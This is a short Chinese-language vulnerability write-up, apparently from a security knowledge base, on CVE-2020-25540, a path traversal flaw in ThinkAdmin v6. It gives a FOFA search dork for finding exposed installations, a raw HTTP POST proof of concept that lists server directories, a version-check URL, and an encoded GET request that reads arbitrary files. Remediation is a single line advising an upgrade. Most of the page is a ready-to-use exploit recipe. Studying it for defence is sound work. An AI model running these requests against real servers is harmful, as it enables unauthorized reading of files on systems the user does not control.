跳转至

Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)

漏洞信息:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

漏洞复现:

fofa_dork: “ThinkAdmin” && title”系统登录 · ThinkAdmin”

POC:

``` POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxxxxx Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 22

rules=%5B%22.%2F%22%5D ![](https://www.bylibrary.cn/wp-content/uploads/2020/09/微信图片_20200921085600.jpg) 获取版本信息: https://xxxxx/admin.html?s=admin/api.Update/version ```2、⽂件读取,后⾯那⼀串是UTF8字符串加密后的结果。计算⽅式在Update.php中的加密函数。 /admin.html? s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本